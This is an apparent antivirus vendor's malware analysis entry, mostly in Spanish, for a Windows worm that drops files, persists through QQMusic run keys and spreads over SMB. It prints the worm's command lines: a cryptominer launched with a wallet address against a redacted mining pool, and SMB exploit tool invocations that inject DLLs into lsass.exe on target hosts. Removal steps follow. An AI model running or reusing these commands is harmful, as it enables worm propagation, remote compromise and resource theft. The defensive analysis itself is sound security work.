Análisis realizado por : Raymart Christian Yambot   

 Alias

Trojan.Win32.Wofith.agu (KASPERSKY)

 Plataforma:

Windows

 Riesgo general:
 Potencial de destrucción:
 Potencial de distribución:
 Infección divulgada:
 Revelación de la información:
Bajo
Medio
High
Crítico

  • Tipo de malware
    Worm

  • Destructivo?
    No

  • Cifrado
     

  • In the Wild:

  Resumen y descripción

Canal de infección Eliminado por otro tipo de malware, Descargado de Internet

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  Detalles técnicos

Tamaño del archivo 9,402,368 bytes
Tipo de archivo EXE
Residente en memoria No
Fecha de recepción de las muestras iniciales 25 agosto 2023
Carga útil Connects to URLs/IPs, Drops files, Modifies system registry

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Infiltra los archivos siguientes:

  • %All Users Profile%\spread.txt → copy of itself
  • %Windows%\bbfsvcc.exe → deleted afterwards
  • %All Users Profile%\SMB.exe → deleted afterwards
  • %All Users Profile%\X86.dll
  • %All Users Profile%\X64.dll
  • %All Users Profile%\{IP Address}.txt
  • \{IP Address}\ADMIN$\spread.txt

(Nota: %Windows% es la carpeta de Windows, que suele estar en C:\Windows o C:\WINNT).

)

Agrega los procesos siguientes:

  • md /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr {Malware File Path} /F
  • cmd /c taskkill /f /im bbfsvcc.exe&&exit
  • taskkill /f /im bbfsvcc.exe
  • cmd /c ipconfig /flushdns
  • cmd /c taskkill /f /im bbfsvcc.exe&&exit;
  • %Windows%\bbfsvcc.exe -o stratum+tcp://{BLOCKED}pool.org:19999 -a cn/r -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p X --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
  • %All Users Profile%\SMB.exe
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostlong.exe --TargetIp {Target IP} --Target {Target OS Machine} --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostlong.exe --TargetIp {Target IP} --Target {Target OS Machine} --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostlong.exe --TargetIp {Target IP} --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostlong.exe --TargetIp {Target IP} --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt

Técnica de inicio automático

Agrega las siguientes entradas de registro para permitir su ejecución automática cada vez que se inicia el sistema:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
QQMusic = {Malware File Path}

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
QQMusic = {Malware File Path}

Otras modificaciones del sistema

Agrega las siguientes entradas de registro:

HKEY_CURRENT_USER\Network\K
RemotePath = \{IP Address}\ADMIN$

HKEY_CURRENT_USER\Network\K
UserName =

HKEY_CURRENT_USER\Network\K
ProviderName = Microsoft Windows Network

HKEY_CURRENT_USER\Network\K
ProviderType = 131072

HKEY_CURRENT_USER\Network\K
ConnectionType = 0

KEY_CURRENT_USER\Network\K
DeferFlags = 4

Otros detalles

Agrega las siguientes entradas de registro como parte de la rutina de instalación:

HKEY_CURRENT_USER\Network\K

It connects to the following possibly malicious URL:

  • {BLOCKED}.{BLOCKED}.{BLOCKED}.2
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.11
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.15
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.4
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.6
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.10
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.5
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.8
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.24
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.26
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.17
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.27
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.7
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.9
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.35
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.23
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.21
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.25
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.37
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.31
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.29
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.12
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.18
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.18
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.32
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.40
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.16
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.28
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.30
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.36
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.42
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.90
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.44
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.48
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.50
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.22
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.46
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.34
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.13
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.66
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.70
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.14
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.74
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.76
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.60
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.98
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.52
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.80
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.86
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.54
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.62
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.64
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.68
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.72
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.82
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.84
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.88
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.92
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.94
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.78
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.41
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.79
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.19
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.20

  Soluciones

Motor de exploración mínimo 9.800
Primer archivo de patrones de VSAPI 18.666.03
Primera fecha de publicación de patrones de VSAPI 30 de agosto de 2023
Versión de patrones OPR de VSAPI 18.667.00
Fecha de publicación de patrones OPR de VSAPI 31 de agosto de 2023

Step 2

Los usuarios de Windows ME y XP, antes de llevar a cabo cualquier exploración, deben comprobar que tienen desactivada la opción Restaurar sistema para permitir la exploración completa del equipo.

Step 3

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 4

Eliminar esta clave del Registro

[ aprenda más ]

Importante: si modifica el Registro de Windows incorrectamente, podría hacer que el sistema funcione mal de manera irreversible. Lleve a cabo este paso solo si sabe cómo hacerlo o si puede contar con ayuda de su administrador del sistema. De lo contrario, lea este artículo de Microsoft antes de modificar el Registro del equipo.

  • In HKEY_CURRENT_USER\Network\K

Step 5

Eliminar este valor del Registro

[ aprenda más ]

Importante: si modifica el Registro de Windows incorrectamente, podría hacer que el sistema funcione mal de manera irreversible. Lleve a cabo este paso solo si sabe cómo hacerlo o si puede contar con ayuda de su administrador del sistema. De lo contrario, lea este artículo de Microsoft antes de modificar el Registro del equipo.

  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • QQMusic = {Malware File Path}
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • QQMusic = {Malware File Path}
  • In HKEY_CURRENT_USER\Network\K
    • RemotePath = \\{IP Addres}\ADMIN$
  • In HKEY_CURRENT_USER\Network\K
    • UserName   
  • In HKEY_CURRENT_USER\Network\K
    • ProviderName = Microsoft Windows Network
  • In HKEY_CURRENT_USER\Network\K
    • ProviderType = 131072
  • In HKEY_CURRENT_USER\Network\K
    • ConnectionType = 0
  • In HKEY_CURRENT_USER\Network\K
    • DeferFlags = 4

Step 6

Buscar y eliminar este archivo

[ aprenda más ]
Puede que algunos de los archivos del componente estén ocultos. Asegúrese de que tiene activada la casilla Buscar archivos y carpetas ocultos en la opción Más opciones avanzadas para que el resultado de la búsqueda incluya todos los archivos y carpetas ocultos.
  • %All Users Profile%\spread.txt
  • %Windows%\bbfsvcc.exe
  • %Windows\bbfsvcc.exe
  • %All Users Profile%\SMB.exe
  • %All Users Profile%\X86.dll
  • %All Users Profile%\X64.dll
  • %All Users Profile%\{IP Address}.txt
  • \\{IP Address}\ADMIN$\spread.txt

Step 7

Explorar el equipo con su producto de Trend Micro para eliminar los archivos detectados como Worm.Win32.BLASQUI.B En caso de que el producto de Trend Micro ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no serán necesarios más pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta página de Base de conocimientos para obtener más información.


Rellene nuestra encuesta!